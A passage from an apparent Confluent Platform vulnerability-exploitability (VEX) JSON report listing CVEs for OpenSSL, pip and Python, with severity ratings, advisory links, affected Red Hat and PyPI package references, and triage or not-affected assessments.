          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-31789",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 9.8,
          "severity": "critical",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 9.8,
          "severity": "critical",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "critical"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.8,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        787
      ],
      "description": "Issue summary: Converting an excessively large OCTET STRING value to\na hexadecimal string leads to a heap buffer overflow on 32 bit platforms.\n\nImpact summary: A heap buffer overflow may lead to a crash or possibly\nan attacker controlled code execution or other undefined behavior.\n\nIf an attacker can supply a crafted X.509 certificate with an excessively\nlarge OCTET STRING value in extensions such as the Subject Key Identifier\n(SKID) or Authority Key Identifier (AKID) which are being converted to hex,\nthe size of the buffer needed for the result is calculated as multiplication\nof the input length by 3. On 32 bit platforms, this multiplication may overflow\nresulting in the allocation of a smaller buffer and a heap buffer overflow.\n\nApplications and services that print or log contents of untrusted X.509\ncertificates are vulnerable to this issue. As the certificates would have\nto have sizes of over 1 Gigabyte, printing or logging such certificates\nis a fairly unlikely operation and only 32 bit platforms are affected,\nthis issue was assigned Low severity.\n\nThe FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this\nissue, as the affected code is outside the OpenSSL FIPS module boundary.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-31789"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-31789"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-032379.html"
        },
        {
          "url": "https://github.com/advisories/GHSA-j79m-9jxq-788r"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/364f095b80601db632b0def6a33316967f863bde"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/7a9087efd769f362ad9c0e30c7baaa6bbfa65ecf"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/945b935ac66cc7f1a41f1b849c7c25adb5351f49"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/a24216018e1ede8ff01a4ff5afff7dfbd443e2f9"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/a91e537d16d74050dbde50bb0dfb1fe9930f0521"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-31789"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260407.txt"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8155-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-31789"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2026/04/07/11"
        }
      ],
      "published": "2026-04-07T22:16:21+00:00",
      "updated": "2026-07-24T23:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-3219",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
      },
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N"
        }
      ],
      "cwes": [
        434
      ],
      "description": "pip handles concatenated tar and ZIP files as ZIP files regardless of filename or whether a file is both a tar and ZIP file. This behavior could result in confusing installation behavior, such as installing \"incorrect\" files according to the filename of the archive. New behavior only proceeds with installation if the file identifies uniquely as a ZIP or tar archive, not as both.",
      "recommendation": "Upgrade pip to version 26.1",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-3219"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/20/8"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-3219"
        },
        {
          "url": "https://github.com/pypa/pip"
        },
        {
          "url": "https://github.com/pypa/pip/issues/13867"
        },
        {
          "url": "https://github.com/pypa/pip/pull/13870"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/QAJ5JIVWWCAJ4EZL2FP5MOOW35JS7LRJ"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/QAJ5JIVWWCAJ4EZL2FP5MOOW35JS7LRJ/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3219"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-3219"
        }
      ],
      "published": "2026-04-20T16:16:45+00:00",
      "updated": "2026-06-17T10:43:14+00:00",
      "affects": [
        {
          "ref": "pkg:pypi/pip@26.0.1",
          "versions": [
            {
              "version": "26.0.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:pypi/pip@26.0.1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-3276",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        407
      ],
      "description": "unicodedata.normalize() can take excessive CPU time when processing\nspecially crafted Unicode input containing long runs of combining characters\nwith alternating Canonical Combining Class values.\nThis affects all normalization forms.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-3276"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/06/03/15"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-3276"
        },
        {
          "url": "https://github.com/python/cpython/commit/6b505d1f41f8f3ea0fe5a4786d3a8fff1875cfc0"
        },
        {
          "url": "https://github.com/python/cpython/commit/90748760d38ca3ac5fc6788a69becab905c95598"
        },
        {
          "url": "https://github.com/python/cpython/commit/991224b1e8311c85f198f6dd8208bf8cff7fc26f"
        },
        {
          "url": "https://github.com/python/cpython/commit/ba785b88add96acbf403d65cb157fb2743a33a32"
        },
        {
          "url": "https://github.com/python/cpython/commit/c5512bd7c1dc28055660565275012766941d3066"
        },
        {
          "url": "https://github.com/python/cpython/commit/d3ab945af25b28dfe13ac6cb40c124a01b33ce1f"
        },
        {
          "url": "https://github.com/python/cpython/commit/db744c0776c1d5dd11aaa70eff2a6993c408bacc"
        },
        {
          "url": "https://github.com/python/cpython/commit/e322a1857084d521f79f45181b776f62e6acfc2c"
        },
        {
          "url": "https://github.com/python/cpython/issues/149079"
        },
        {
          "url": "https://github.com/python/cpython/pull/149080"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/PP5HB4K7727OBBM76KA2ILID76K3OZGZ/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3276"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8509-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-3276"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2026/06/03/15"
        }
      ],
      "published": "2026-06-03T16:16:29+00:00",
      "updated": "2026-08-13T01:16:52+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
